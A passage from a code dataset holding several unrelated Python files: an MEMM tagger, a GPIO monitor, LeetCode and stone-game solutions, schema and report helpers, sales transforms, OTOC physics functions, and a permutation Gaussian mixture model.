utils.data_loader import DataLoader\nfrom utils.ftr_builders import TransitionFtr, EmmisionFtr, SuffixPrefix, CombinationsWordsPos, CostumeFtr\nfrom utils.viterbi import ViterbiAlg\nfrom utils.params import LEN_FTR, START\n\n\nclass MEMMTagger:\n    def __init__(self, to_pred, model_file, feature_map, out_name=\"greedy_pred\"):\n        self._probs = {}\n        self._model = pickle.load(open(model_file, \"rb\"))\n        ftr_builders = [TransitionFtr(out_dim=LEN_FTR), EmmisionFtr(out_dim=LEN_FTR), SuffixPrefix(out_dim=LEN_FTR),\n                        CombinationsWordsPos(out_dim=LEN_FTR), CostumeFtr()]\n        self._dl = DataLoader(to_pred, feature_map, ftr_builders)\n        self._label_list = self._dl.label_list + [START]\n        self._label_to_idx = {label: i for i, label in enumerate(self._label_list)}\n        self._tagger = ViterbiAlg(self._label_list, self._prob_func)\n        self._init_probs()\n\n    # --------------------- prob_func ---------------------\n    # input: word_sequence, curr_word_idx, src_prob_row, prev_POS, curr_POS, log=T/F\n    # output: best_score, back pointer\n\n    def _prob_func(self, word_sequence, curr_word_idx, src_prob_row, prev_POS, curr_POS, log=True):\n        if curr_POS == START or (curr_word_idx != 0 and prev_POS == START):\n            return -2000000000000000 if log else 0, 0\n\n        words = []\n        words.append(word_sequence[curr_word_idx - 1] if curr_word_idx > 0 else START)\n        words.append(word_sequence[curr_word_idx - 2] if curr_word_idx > 1 else START)\n        words.append(word_sequence[curr_word_idx])\n        words.append(word_sequence[curr_word_idx + 1] if curr_word_idx + 1 < len(word_sequence) else None)\n        words.append(word_sequence[curr_word_idx + 2] if curr_word_idx + 2 < len(word_sequence) else None)\n\n        if log:\n            if np.std(src_prob_row) > 0:\n                good_chance = np.argsort(src_prob_row)[-8:]\n            else:\n                good_chance = list(range(len(src_prob_row)))\n            scores = {}\n            for ii, prev_prev_pos in enumerate(good_chance):\n                if str(([prev_prev_pos, prev_POS], words)) not in self._probs:\n                    sparse_vec = self._dl.to_sparse(word_sequence, [prev_prev_pos, prev_POS], curr_word_idx)\n                    self._probs[str(([prev_prev_pos, prev_POS], words))] = \\\n                        self._model.predict_proba(sparse_vec)[0]\n\n                if ii < 3 or self._probs[str(([prev_prev_pos, prev_POS], words))][self._label_to_idx[curr_POS]] > 0.2:\n                    scores[prev_prev_pos] = \\\n                        self._probs[str(([prev_prev_pos, prev_POS], words))][self._label_to_idx[curr_POS]]\n\n            
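            # In log space the accumulated path score and the transition probability combine by addition (by multiplication in probability space).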
scores = {key: src_prob_row[key] + self._my_log(val) if log else src_prob_row[key] * val for key, val\n in scores.items()}\n back_pointer, best_score = max(scores.items(), key=lambda x: x[1])\n return best_score, back_pointer\n\n def _init_probs(self):\n print(\"loadig model...\")\n for j, (all_pos, all_words) in enumerate(self._dl.data):\n\n len_data = len(self._dl)\n if (100 * j / len_data) % 10 == 0:\n print(str((100 * j / len_data)) + \"%\")\n prev_pos = [START, START]\n for i, (word, pos) in enumerate(zip(all_words, all_pos)):\n words = []\n words.append(all_words[i - 1] if i > 0 else START)\n words.append(all_words[i - 2] if i > 1 else START)\n words.append(all_words[i])\n words.append(all_words[i + 1] if i + 1 < len(all_words) else None)\n words.append(all_words[i + 2] if i + 2 < len(all_words) else None)\n\n sparse_vec = self._dl.to_sparse(all_words, [prev_pos[-2], prev_pos[-1]], i)\n self._probs[str(([prev_pos[-2], prev_pos[-1]], words))] = \\\n self._model.predict_proba(sparse_vec)[0]\n prev_pos.append(pos)\n\n @staticmethod\n def _my_log(x):\n if x == 0:\n return -100\n if x == 1:\n return -0.001\n else:\n return np.log(x)\n\n def memm_tag(self, out_name=\"res_MEMM\"):\n out_file = open(out_name, \"wt\")\n\n all_count = 0\n true_count = 0\n len_data = len(self._dl)\n for i, (all_pos, all_words) in enumerate(self._dl.data):\n if (100 * i / len_data) % 10 == 0:\n print(str((100 * i / len_data)) + \"%\")\n curr_pred = self._tagger.pred_viterbi(all_words, log=True)\n\n # print tp screen\n identical = sum([1 for p, l in zip(curr_pred, all_pos) if p == l])\n recall = str(int(identical / len(curr_pred) * 100))\n print(\"pred: \" + str(curr_pred) + \"\\nlabel: \" + str(all_pos) +\n \"\\nrecall:\\t\" + str(identical) + \"/\" + str(len(curr_pred)) + \"\\t~\" + recall + \"%\")\n\n # write to file\n for w, p in zip(all_words, curr_pred):\n out_file.write(w + \"/\" + p + \" \")\n out_file.write(\"\\n\")\n\n # calc recall\n for p, t in zip(all_pos, curr_pred):\n all_count += 1\n true_count += 1 if p == t else 0\n all_count += 1\n print(all_count, true_count, \"\\t~\" + str(int(100*true_count/all_count)) + \"%\")\n out_file.close()\n\n\nif __name__ == \"__main__\":\n args = sys.argv\n if len(args) < 5:\n print(\"input\\t\\tinput_file_name,\\t modelname,\\t feature_map_file,\\t out_file_name\\n\\n\")\n MEMMTagger(args[1], args[2], args[3]).memm_tag(out_name=args[4])\n\n","sub_path":"MEMM/MEMMTag.py","file_name":"MEMMTag.py","file_ext":"py","file_size_in_byte":5602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"519048848","text":"#!/usr/bin/env python\n\"\"\"\nmonitor.py\n2021-01-11\nPublic Domain\n\nhttp://abyz.me.uk/lg/py_lgpio.html\n\n./monitor.py [chip:]gpio ...\n\nchip specifies a gpiochip number. 
gpio is a GPIO in the previous\ngpiochip (gpiochip0 if there is no previous gpiochip).\n\ne.g.\n\n./monitor.py 23 24 25 # monitor gpiochip0: 23,24,25\n./monitor.py 0:23 24 1:0 5 6 # monitor gpiochip0: 23,24 gpiochip1: 0,5,6\n\"\"\"\n\nimport sys\nimport time\nimport lgpio as sbc\n\ndef cbf(chip, gpio, level, tick):\n print(\"chip={} gpio={} level={} time={:.09f}\".format(\n chip, gpio, level, tick / 1e9))\n\nhandle = -1\nchip = 0\ngpio = 0\n\nargc = len(sys.argv)\n\nsbc.exceptions = False\n\nfor i in range(1, argc):\n\n p = sys.argv[i].split(':')\n\n if len(p) == 2:\n\n # chip:gpio option\n\n c = int(p[0])\n g = int(p[1])\n\n print(\"chip={} gpio={}\".format(c, g))\n\n if c != chip:\n handle = -1; # force open of new gpiochip\n\n chip = c\n gpio = g\n\n elif len(p) == 1:\n\n # gpio option\n\n g = int(p[0])\n\n print(\"chip={} gpio={}\".format(chip, g))\n\n # chip the same as previous\n gpio = g\n\n else:\n\n # bad option\n\n print(\"don't understand {}\".format(sys.argv[i]))\n exit()\n\n if gpio >= 0:\n\n if handle < 0:\n\n # get a handle to the gpiochip\n handle = sbc.gpiochip_open(chip)\n\n if handle >= 0:\n\n # got a handle, now open the GPIO for alerts\n err = sbc.gpio_claim_alert(handle, gpio, sbc.BOTH_EDGES)\n\n if err < 0:\n\n print(\"GPIO in use {}:{} ({})\".format(\n chip, gpio, sbc.error_text(err)))\n exit()\n\n cb_id = sbc.callback(handle, gpio, sbc.BOTH_EDGES, cbf)\n\n else:\n\n print(\"can't open gpiochip {} ({})\".format(\n chip, sbc.error_text(handle)))\n exit()\n\n else:\n\n print(\"don't understand {}\".format(sys.argv[i]))\n exit()\n\nsbc.exceptions = True\n\nwhile True:\n time.sleep(1)\n\n","sub_path":"EXAMPLES/py_lgpio/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":1932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"193845575","text":"'''\nGiven a binary tree, return the bottom-up level order traversal of its nodes'\nvalues. (ie, from left to right, level by level from leaf to root).\n\nFor example:\nGiven binary tree [3,9,20,null,null,15,7],\n 3\n / \\\n 9 20\n / \\\n 15 7\nreturn its bottom-up level order traversal as:\n[\n [15,7],\n [9,20],\n [3]\n]\n'''\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\nfrom typing import Optional, List\nfrom lib import TreeNode, list_to_tree\nclass Solution:\n def levelOrderBottom(self, root: Optional[TreeNode]) -> List[List[int]]:\n res = []\n if root: \n level = [root]\n while level: \n res.append([node.val for node in level])\n level =[leaf for node in level for leaf in (node.left, node.right) if leaf]\n return res[::-1]\n \n\n# test\nroot = list_to_tree([3,9,20,None,None,15,7])\nprint(Solution().levelOrderBottom(root))\n","sub_path":"leetcode/LC107. Binary Tree Level Order Traversal II.py","file_name":"LC107. 
Binary Tree Level Order Traversal II.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"475674904","text":"# coding=utf-8\nfrom typing import Any, Optional, Mapping\n\nfrom bson import ObjectId\nfrom marshmallow import Schema, pre_load, fields\n\n\n__all__ = ['ObjectIdField', 'StripEmptySchema']\n\n\nclass ObjectIdField(fields.Field):\n def _serialize(self, value: ObjectId, attr: str, obj: Any, **kwargs):\n return str(value)\n\n def _deserialize(self, value: str, attr: Optional[str],\n data: Optional[Mapping[str, Any]], **kwargs):\n return ObjectId(value)\n\n\nclass StripEmptySchema(Schema):\n @pre_load\n def _strip_off(self, data, **kwargs):\n stripped_keys = []\n for k, v in data.items():\n if v is None:\n stripped_keys.append(k)\n elif isinstance(v, str) and v.strip() == '':\n stripped_keys.append(k)\n elif isinstance(v, (list, tuple, dict, set)) and len(v) == 0:\n stripped_keys.append(k)\n for k in stripped_keys:\n del data[k]\n return data\n","sub_path":"celery_workers/base_schema.py","file_name":"base_schema.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"300932614","text":"import services.controlers.reportsControler\nimport json\nfrom json import JSONEncoder\nfrom json import JSONDecoder\nfrom services.exceptions import *\n\nclass WarehousesReportView:\n\tdef get (self):\n\t\tresponse_data = {}\n\t\terror = ErrorNoAdmitePeticionesGet()\n\t\tresponse_data['status']=error.code\n\t\tresponse_data['message']=error.message\n\t\tresponse_data['data']=''\n\t\tjsonStringResponse = JSONEncoder().encode(response_data)\n\t\treturn jsonStringResponse\n\tdef post(self, fromDate, toDate):\n\t\tresponse_data = {}\n\t\t#se cambia el formato de fecha al datetame de datastore#\n\t\tjsonFromDate = json.loads(fromDate)\n\t\tfromDate = str('')+str(jsonFromDate['year'])+str('-')+str(jsonFromDate['month'])+str('-')+str(jsonFromDate['day'])+str(' ')+str('00:00:00.000000')\n\t\tjsonToDate = json.loads(toDate)\n\t\ttoDate = str('')+str(jsonToDate['year'])+str('-')+str(jsonToDate['month'])+str('-')+str(jsonToDate['day'])+str(' ')+str('23:59:59.999999')\n\t\ttry:\n\t\t\treportsControler =services.controlers.reportsControler.ReportsControler()\n\t\t\tdata = reportsControler.getWarehousesReport(fromDate, toDate)\n\t\t\tresponse_data['status']=OK\n\t\t\tresponse_data['message']='Reporte_Enviado'\n\t\t\tresponse_data['data'] = data\n\t\texcept ExceptionWithCode as e:\n\t\t\tresponse_data['status']=e.code\n\t\t\tresponse_data['message']=e.message\n\t\t\tresponse_data['data']=''\n\n\t\texcept Exception as e:\n\t\t\tresponse_data['status']=ERROR_NO_DEFINIDO\n\t\t\tresponse_data['message']=e.message\n\t\t\tresponse_data['data']=''\n\t\t\tloggControler = services.controlers.loggControler.LoggControler()\n\t\t\tloggControler.addLogg('Critical', ERROR_NO_DEFINIDO, e.message)\n\n\t\tjsonStringResponse = JSONEncoder().encode(response_data)\n\t\treturn jsonStringResponse","sub_path":"services/views/warehousesReportView.py","file_name":"warehousesReportView.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"334935552","text":"from EDA import merging, reorder_columns, convert_dates_to_months, group_into_monthly_sales\nimport pandas as pd\nimport numpy as np\nimport statsmodels.formula.api as smf\nfrom sklearn.preprocessing import 
MinMaxScaler\n\n\"\"\"this module hosts functions that help to analyze the contributions by shop to the total sales\"\"\"\n\n\ndef group_by_shop(sales_m: pd.DataFrame) -> pd.DataFrame:\n    sales_m_agg = sales_m.groupby(['date', 'date_block_num', 'shop_id']).item_cnt_month.sum().reset_index()\n    agg_sales = sales_m_agg.groupby('date_block_num').item_cnt_month.sum().reset_index()\n    date_agg = dict(zip(agg_sales.date_block_num, agg_sales.item_cnt_month))\n    sales_m_agg['agg'] = sales_m_agg.date_block_num.map(date_agg)\n    sales_m_agg['shop_contrib'] = sales_m_agg['item_cnt_month'] / sales_m_agg['agg']\n\n    return sales_m_agg\n\n\ndef test_contrib(sales_m_agg: pd.DataFrame):\n    for num in sales_m_agg.date_block_num.unique():\n        assert sales_m_agg[sales_m_agg.date_block_num == num]['shop_contrib'].sum() == 1.0\n\n\ndef build_featureset(df_diff: pd.DataFrame, look_back: int) -> pd.DataFrame:\n    # create dataframe for transformation from time series to supervised\n    X = df_diff.copy()\n    df_supervised = X.drop(['prev_sales'], axis=1)\n    for i in range(1, look_back + 1):\n        fieldname = 'lag_' + str(i)\n        df_supervised[fieldname] = df_supervised['diff'].shift(i)\n    # drop Nan\n    df_supervised = df_supervised.dropna(axis=0, inplace=False).reset_index(drop=True)\n\n    return df_supervised\n\n\ndef scale_features(df_supervised: pd.DataFrame) -> (MinMaxScaler, np.ndarray):\n    df_model = df_supervised.drop(['sales', 'date'], axis=1)\n    scaler = MinMaxScaler(feature_range=(-1, 1))\n    scaler.fit(df_model.values)\n    train_set_scaled = scaler.transform(df_model.values)\n\n    return scaler, train_set_scaled\n\n\ndef adjusted_r_sqrt(df_supervised: pd.DataFrame, target: str, features: list):\n    streak = features[0]\n    for feature in features[1:]:\n        streak += ' + ' + feature\n    model = smf.ols(formula=target + ' ~ ' + str(streak), data=df_supervised)\n    model_fit = model.fit()\n    regression_adj_rsq = model_fit.rsquared_adj\n    print(regression_adj_rsq)\n","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":2202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"133659785","text":"\"\"\"\nStone Game\nAlex and Lee play a game with piles of stones. There are an even number of piles arranged in a row, and each pile has a positive integer number of stones piles[i].\n\nThe objective of the game is to end with the most stones. The total number of stones is odd, so there are no ties.\n\nAlex and Lee take turns, with Alex starting first. Each turn, a player takes the entire pile of stones from either the beginning or the end of the row. 
This continues until there are no more piles left, at which point the person with the most stones wins.\n\nAssuming Alex and Lee play optimally, return True if and only if Alex wins the game.\n\n\n\nExample 1:\n\nInput: piles = [5,3,4,5]\nOutput: true\nExplanation:\nAlex starts first, and can only take the first 5 or the last 5.\nSay he takes the first 5, so that the row becomes [3, 4, 5].\nIf Lee takes 3, then the board is [4, 5], and Alex takes 5 to win with 10 points.\nIf Lee takes the last 5, then the board is [3, 4], and Alex takes 4 to win with 9 points.\nThis demonstrated that taking the first 5 was a winning move for Alex, so we return true.\n\n\nConstraints:\n\n2 <= piles.length <= 500\npiles.length is even.\n1 <= piles[i] <= 500\nsum(piles) is odd.\n\"\"\"\nfrom functools import lru_cache\nfrom typing import List\n\n\nclass Solution:\n def stoneGame(self, piles: List[int]) -> bool:\n # Solution 1 - 524 ms\n \"\"\"\n @lru_cache(None)\n def dp(left, right):\n if left > right: return (0, 0)\n\n pickLeft = dp(left + 1, right)\n pickRight = dp(left, right - 1)\n\n if piles[left] + pickLeft[1] > piles[right] + pickRight[\n 1]: # If the left choice has higher score than the right choice\n return piles[left] + pickLeft[1], pickLeft[0] # then pick left\n\n return piles[right] + pickRight[1], pickRight[0] # else pick right\n\n alexScore, leeScore = dp(0, len(piles) - 1)\n return alexScore > leeScore\n \"\"\"\n # Solution 2 - 52 ms\n memo = {}\n\n def helper(alex, lee, start, end):\n if start > end:\n return alex > lee\n if (start, end) in memo:\n return memo[(start, end)]\n ret = (helper(alex + piles[start], lee + piles[end], start + 1, end - 1) or\n helper(alex + piles[start], lee + piles[start + 1], start + 2, end) or\n helper(alex + piles[end], lee + piles[start], start + 1, end - 1) or\n helper(alex + piles[end], lee + piles[end - 1], start, end - 2))\n memo[(start, end)] = ret\n return ret\n\n return helper(0, 0, 0, len(piles) - 1)\n\n\n# Main Call\npiles = [5, 3, 4, 5]\nsolution = Solution()\nprint(solution.stoneGame(piles))\n","sub_path":"src/arrays/stoneGame.py","file_name":"stoneGame.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"652583580","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 13 16:34:01 2020\n\n@author: vgs23\n\"\"\"\n\nimport numpy as np\n\nglobal vals,vecs,x_arr,dx,dy,basis_N,n_eigen\n\ndef pos_matrix_elts(n,k):\n global vals,vecs,x_arr,dx,dy,basis_N\n return np.sum(vecs[:,n]*vecs[:,k]*x_arr*dx*dy)\n #return np.sum(vecs[:,n]*vecs[:,k]*x*dx)#np.sum(temp1*temp2*x*dx)#\n \nx_matrix = np.vectorize(pos_matrix_elts)\n\n#pos_mat_elt = 0.0\n#n_arr = np.arange(5)\nk_arr = np.arange(basis_N)\n#pos_mat = np.zeros_like(k_arr)\n#cProfile.run('OTOC_f.position_matrix.compute_pos_mat_arr_k(vecs,x_arr,dx,dy,n,k_arr,pos_mat)')\n#cProfile.run('x_matrix(n,k_arr)')\n#print('Normalised?', np.sum(vecs[:,2]*vecs[:,2]*dx))\n#print('Norm:', np.sum(vecs[:,2]*vecs[:,2]*dx*dy))\n#tarr = np.arange(0,50,1e-1)\n\ndef b_matrix(n,m,t):\n karr = np.arange(0,basis_N)\n E_km = vals[karr] - vals[m]\n E_nk = vals[n] - vals[karr]\n x_nk= x_matrix(n,karr)\n x_km = x_matrix(karr,m)\n return 0.5*np.sum(x_nk*x_km*(E_km*np.exp(1j*E_nk*t) - E_nk*np.exp(1j*E_km*t)))\n\nb_matrix = np.vectorize(b_matrix)\n#cProfile.run('OTOC_f.position_matrix.b_matrix_elts(vecs,x_arr,dx,dy,k_arr,vals,2,2,1.0,b_mat_elt)')\n#cProfile.run('b_matrix(2,2,1.0)')\n\nm_arr = np.arange(0,basis_N)\nb_mat 
= np.zeros_like(m_arr)\n#cProfile.run('OTOC_f.position_matrix.compute_b_mat_arr_m(vecs,x_arr,dx,dy,k_arr,vals,2,m_arr,1.0,b_mat)')\n#cProfile.run('b_matrix(2,m_arr,1.0)')\n\ndef c_mc(n,t):\n marr = np.arange(0,basis_N)\n b_nm = b_matrix(n,marr,t)\n return np.sum(b_nm*np.conj(b_nm))\n\nc_mc = np.vectorize(c_mc)\n\n#t_arr = np.arange(0,5,0.1)\n#c_mc_elt = np.zeros_like(t_arr)\n#c_mc_elt = OTOC_f.position_matrix.compute_c_mc_arr_n(vecs,x_arr,dx,dy,k_arr,vals,np.arange(10),m_arr,3.0,c_mc_elt)\n#c_mc_elt = OTOC_f.position_matrix.compute_c_mc_arr_t(vecs,x_arr,dx,dy,k_arr,vals,1,m_arr,t_arr,c_mc_elt)\n \n#plt.plot(t_arr,c_mc_elt)\n#plt.show()\n\ndef OTOC(t,beta):\n global vals,n_eigen\n val = vals[:n_eigen]\n Z = np.sum(np.exp(-beta*val))\n n_arr = np.arange(0,len(val))\n return (1/Z)*np.sum(np.exp(-beta*val)*c_mc(n_arr,t) )\n\nOTOC = np.vectorize(OTOC)\n\n#cProfile.run('OTOC_f.position_matrix.compute_otoc_arr_t(vecs,x_arr,dx,dy,k_arr,vals,m_arr,t_arr,0.001,n_eigen,OTOC_mat)')\n#cProfile.run('OTOC(t_arr,0.001)')","sub_path":"Python_files/OTOC/OTOC.py","file_name":"OTOC.py","file_ext":"py","file_size_in_byte":2255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"559442365","text":"import numpy as np\nimport itertools as itr\nimport amitgroup as ag\nfrom scipy.misc import logsumexp\nfrom sklearn.base import BaseEstimator\nimport time\n\n_COV_TYPES = ['ones', 'tied', 'diag', 'diag-perm',\n 'full', 'full-perm', 'full-full']\n\n\nclass PermutationGMM(BaseEstimator):\n \"\"\"\n\n \"\"\"\n def __init__(self, n_components=1, permutations=1, covariance_type='tied',\n min_covar=1e-3, n_iter=20, n_init=1, params='wmc',\n random_state=0, thresh=1e-2, covar_limit=None, target_entropy=None):\n\n assert covariance_type in _COV_TYPES, \"Covariance type not supported\"\n if not isinstance(random_state, np.random.RandomState):\n random_state = np.random.RandomState(random_state)\n\n self._covtype = covariance_type\n self.random_state = random_state\n self.n_components = n_components\n\n if isinstance(permutations, int):\n # Cycle through them\n P = permutations\n self.permutations = np.zeros((P, P), dtype=np.int64)\n for p1, p2 in itr.product(range(P), range(P)):\n self.permutations[p1, p2] = (p1 + p2) % P\n else:\n self.permutations = np.asarray(permutations)\n\n self.n_iter = n_iter\n self.n_init = n_init\n self.thresh = thresh\n self.min_covar = min_covar\n self._covar_limit = covar_limit\n self._params = params\n self._target_entropy = target_entropy\n\n self.weights_ = None\n self.means_ = None\n self.covars_ = None\n\n def score_block_samples(self, X):\n \"\"\"\n Score complete samples according to the full model. This means that\n each sample has all its blocks with the different transformations for\n each permutation.\n\n Parameters\n ----------\n X : ndarray\n Array of samples. 
Must have shape `(N, P, D)`, where `N` are number\n of samples, `P` number of permutations and `D` number of dimensions\n (flattened if multi-dimensional).\n\n Returns\n -------\n logprob : array_like, shape (n_samples,)\n Log probabilities of each full data point in X.\n log_responsibilities : array_like,\n shape (n_samples, n_components, n_permutations)\n Log posterior probabilities of each mixture component and\n permutation for each observation.\n\n \"\"\"\n from scipy.stats import multivariate_normal\n N = X.shape[0]\n K = self.n_components\n P = len(self.permutations)\n\n unorm_log_resp = np.empty((N, K, P))\n unorm_log_resp[:] = np.log(self.weights_[np.newaxis])\n\n for p in range(P):\n for shift in range(P):\n p0 = self.permutations[shift, p]\n for k in range(K):\n if self._covtype == 'ones':\n cov = np.diag(self.covars_)\n elif self._covtype == 'tied':\n cov = self.covars_\n elif self._covtype == 'diag-perm':\n cov = np.diag(self.covars_[p])\n elif self._covtype == 'diag':\n cov = np.diag(self.covars_[k, p])\n elif self._covtype == 'full':\n cov = self.covars_[k]\n elif self._covtype == 'full-perm':\n cov = self.covars_[p]\n elif self._covtype == 'full-full':\n cov = self.covars_[k, p]\n\n unorm_log_resp[:, k, p] += multivariate_normal.logpdf(\n X[:, p0],\n mean=self.means_[k, shift],\n cov=cov)\n\n unorm_reshaped = unorm_log_resp.reshape((unorm_log_resp.shape[0], -1))\n logprob = logsumexp(unorm_reshaped.clip(min=-500), axis=-1)\n log_resp = unorm_log_resp - logprob[..., np.newaxis, np.newaxis]\n log_resp = log_resp.clip(min=-500)\n\n return logprob, log_resp\n\n def fit(self, X):\n \"\"\"\n Estimate model parameters with the expectation-maximization algorithm.\n\n Parameters are set when constructing the estimator class.\n\n Parameters\n ----------\n X : array_like, shape (n, n_permutations, n_features)\n Array of samples, where each sample has been transformed\n `n_permutations` times.\n\n \"\"\"\n def diff_entropy(cov):\n sign, logdet = np.linalg.slogdet(cov)\n return 0.5 * cov.shape[0] * np.log(2 * np.pi * np.e) + logdet\n\n def reg_covar(cov0, mcov, target_entropy):\n def regularize_cov(reg_val):\n return cov0 * (1 - reg_val) + np.eye(cov0.shape[0]) * reg_val\n\n lo, hi = self.min_covar * (1 + np.array([-0.95, 2.95]))\n ent = None\n for d in range(15):\n mi = np.mean([lo, hi])\n\n c = regularize_cov(mi)\n ent = diff_entropy(c)\n print('ent', ent)\n if ent > target_entropy:\n hi = mi\n else:\n lo = mi\n\n mcov1 = np.mean([lo, hi])\n print('mcov multiple', mcov1 / mcov)\n return regularize_cov(mcov1)\n\n\n assert X.ndim == 3\n N, P, F = X.shape\n\n assert P == len(self.permutations)\n K = self.n_components\n\n if K == 1 and P == 1 and self._covtype == 'diag':\n self.weights_ = np.ones(1)\n self.means_ = ag.apply_once(np.mean, X, [0])\n c0 = ag.apply_once(np.var, X, [0])\n self.covars_ = c0 + self.min_covar\n self.converged_ = True\n def diff_entropy(cov):\n return 0.5 * cov.shape[2] * np.log(2 * np.pi * np.e) + np.sum(np.log(np.fabs(cov)))\n\n if self._target_entropy is None:\n c = c0 + self.min_covar\n ent = diff_entropy(c)\n self._target_entropy = ent\n self.covars_ = c\n self._entropy = ent\n else:\n lo, hi = self.min_covar * (1 + np.array([-0.25, 0.25]))\n self._entropy = diff_entropy(self.covars_)\n for d in range(10):\n mi = np.mean([lo, hi])\n\n c = c0 + mi\n ent = diff_entropy(c)\n print('ent', ent)\n if ent > self._target_entropy:\n hi = mi\n else:\n lo = mi\n\n mcov = np.mean([lo, hi])\n print('mcov', mcov)\n\n print('target_entropy', self._target_entropy)\n 
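                # Report how far the bisected entropy landed from the requested target.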
print('diff', np.fabs(ent - self._target_entropy))\n\n self.covars_ = c0 + mcov\n self._entropy = diff_entropy(self.covars_)\n return\n if K == 1 and P == 1 and self._covtype == 'tied':\n cov0 = np.cov(X[:,0].T)\n\n U, S, V = np.linalg.svd(cov0)\n def regularize_cov(reg_val):\n #return cov0 + np.eye(cov.shape[0]) * reg_val\n return cov0 * (1 - reg_val) + np.eye(cov0.shape[0]) * reg_val\n #regS = S.clip(min=reg_val)\n #regS = (S + 0.0001) * (reg_val / self.min_covar)\n #return np.dot(np.dot(U, np.diag(regS)), V)\n\n self.weights_ = np.ones(1)\n self.means_ = ag.apply_once(np.mean, X, [0])\n self.converged_ = True\n if self._target_entropy is None:\n c = regularize_cov(self.min_covar)\n ent = diff_entropy(c)\n self.covars_ = c\n self._entropy = ent\n else:\n lo, hi = self.min_covar * (1 + np.array([-0.95, 1.95]))\n ent = None\n for d in range(15):\n mi = np.mean([lo, hi])\n\n c = regularize_cov(mi)\n ent = diff_entropy(c)\n print('ent', ent)\n if ent > self._target_entropy:\n hi = mi\n else:\n lo = mi\n\n mcov = np.mean([lo, hi])\n print('mcov', mcov)\n\n print('target_entropy', self._target_entropy)\n print('diff', np.fabs(ent - self._target_entropy))\n\n self.covars_ = regularize_cov(mcov) #np.cov(X[:,0].T) + np.diag(np.ones(F)*mcov)\n\n #print('diff entropy', diff_entropy(self.covars_))\n\n self._entropy = diff_entropy(self.covars_)\n return\n\n #N34 = 3 * N // 4\n #HX = X[N34:]\n #X = X[:N34]\n\n #HN = N - N34\n #N = N34\n print('HERE')\n\n XX = X.reshape((-1, X.shape[-1]))\n\n max_log_prob = -np.inf\n\n for trial in range(self.n_init):\n loglikelihoods = []\n self.weights_ = np.ones((K, P)) / (K * P)\n\n flatX = X.reshape((-1, F))\n\n # Initialize to covariance matrix of all samples\n if self._covtype == 'diag':\n pass\n elif 0:\n cv = np.eye(F)\n elif 1:\n print('cov')\n cv = (1 - self.min_covar) * np.cov(flatX.T) + self.min_covar * np.eye(F)\n print('cov done')\n else:\n cv = ag.io.load('/var/tmp/cov.h5')\n\n # Initialize by picking K components at random.\n if self._covtype == 'diag':\n repr_samples = X[self.random_state.choice(N, K, replace=False)]\n self.means_ = repr_samples\n elif 0:\n # Initialize by running kmeans\n assert P == 1\n from sklearn.cluster import KMeans\n clf = KMeans(n_clusters=K)\n XX2 = np.dot(cv, flatX.T).T\n\n clf.fit(XX2)\n\n means = clf.means_\n\n self.means_ = clf.means_.reshape((K,) + X.shape[1:])\n else:\n # TODO: Does not initialize permutations in a coherent way, but\n # this might not be needed anyway\n rs = np.random.RandomState(trial) # TODO: Insert seed\n mm = rs.multivariate_normal(np.zeros(F), cv, size=K * P)\n self.means_ = mm.reshape((K,) + X.shape[1:])\n\n if self._covtype == 'ones':\n self.covars_ = np.ones(cv.shape[0])\n elif self._covtype == 'tied':\n self.covars_ = cv\n elif self._covtype == 'diag':\n self.covars_ = np.tile(np.ones(F), (K, P, 1))\n elif self._covtype == 'diag-perm':\n self.covars_ = np.tile(np.diag(cv).copy(), (P, 1))\n elif self._covtype == 'full':\n self.covars_ = np.tile(cv, (K, 1, 1))\n elif self._covtype == 'full-perm':\n self.covars_ = np.tile(cv, (P, 1, 1))\n elif self._covtype == 'full-full':\n self.covars_ = np.tile(cv, (K, P, 1, 1))\n\n self.converged_ = False\n for loop in range(self.n_iter):\n start = time.clock()\n\n # E-step\n logprob, log_resp = self.score_block_samples(X)\n\n #test_logprob, _ = self.score_block_samples(HX)\n #test_loglikelihood = test_logprob.sum()\n\n # TODO\n hh = np.histogram(np.exp(log_resp.max(-1).max(-1)),\n bins=np.linspace(0, 1, 11))\n\n sh = (-1, log_resp.shape[1])\n resp = 
np.exp(log_resp)\n lresp = log_resp.transpose((0, 2, 1)).reshape(sh)\n log_dens = logsumexp(lresp, axis=0)[np.newaxis, :, np.newaxis]\n dens = np.exp(log_dens)\n\n # M-step\n\n if 'm' in self._params:\n for p in range(P):\n v = 0.0\n for shift in range(P):\n p0 = self.permutations[shift, p]\n v += np.dot(resp[:, :, shift].T, X[:, p0])\n\n self.means_[:, p, :] = v\n self.means_ /= dens.ravel()[:, np.newaxis, np.newaxis]\n\n if 'w' in self._params:\n ww = (ag.apply_once(np.sum, resp, [0], keepdims=False) / N)\n self.weights_[:] = ww.clip(0.0001, 1 - 0.0001)\n\n if 'c' in self._params:\n if self._covtype == 'ones':\n # Do not update\n pass\n elif self._covtype == 'tied':\n from pnet.cyfuncs import calc_new_covar\n self.covars_[:] = calc_new_covar(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n # Now make sure the diagonal is not overfit\n dd = np.diag(self.covars_)\n D = self.covars_.shape[0]\n self.covars_ = (self.covars_ * (1 - self.min_covar) +\n np.eye(D) * self.min_covar)\n\n elif self._covtype == 'diag':\n from pnet.cyfuncs import calc_new_covar_diag as calc\n self.covars_[:] = calc(X[:self._covar_limit],\n self.means_,\n resp,\n self.permutations)\n\n self.covars_[:] += 